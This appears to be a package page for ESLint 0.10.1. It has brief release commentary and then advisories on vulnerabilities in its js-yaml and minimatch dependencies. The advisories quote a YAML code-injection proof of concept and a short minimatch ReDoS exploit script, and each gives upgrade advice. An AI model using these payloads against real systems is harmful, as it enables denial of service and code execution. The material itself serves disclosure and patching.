ESLint version 0.10.1 represents a minor update to the popular JavaScript linting tool, building upon the foundation established by version 0.10.0. While both versions share identical core dependencies and development dependencies—including crucial tools like Esprima for parsing, Mocha for testing, and js-yaml for configuration—the key difference lies in the release date. Version 0.10.1 was released on December 6, 2014, a little over a week from the previous version that was released on November 27, 2014. This suggests that version 0.10.1 likely incorporates bug fixes, minor enhancements, or refinements identified since the 0.10.0 release.
For developers using ESLint, this means upgrading to 0.10.1 is advisable to ensure you're benefiting from the most up-to-date and stable experience. Although the core functionality remains the same, bug fixes can be crucial for preventing unexpected behavior or misinterpretations of code, leading to more accurate and reliable linting results. These updates ensure smoother integration with complex JavaScript projects, reduce false positives, and improve the overall developer workflow. The presence of development dependencies like eslint-tester, mocha-phantomjs, and browserify highlights the project's commitment to rigorous testing and cross-platform compatibility, further reassuring developers of its robust nature.
All the vulnerabilities related to the version 0.10.1 of the package
Denial of Service in js-yaml
Versions of js-yaml prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service.
Upgrade to version 3.13.0.
Code Injection in js-yaml
Versions of js-yaml prior to 3.13.1 are vulnerable to Code Injection. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have toString as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.
An example payload is
{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1
which returns the object
{
"1553107949161": 1
}
Upgrade to version 3.13.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.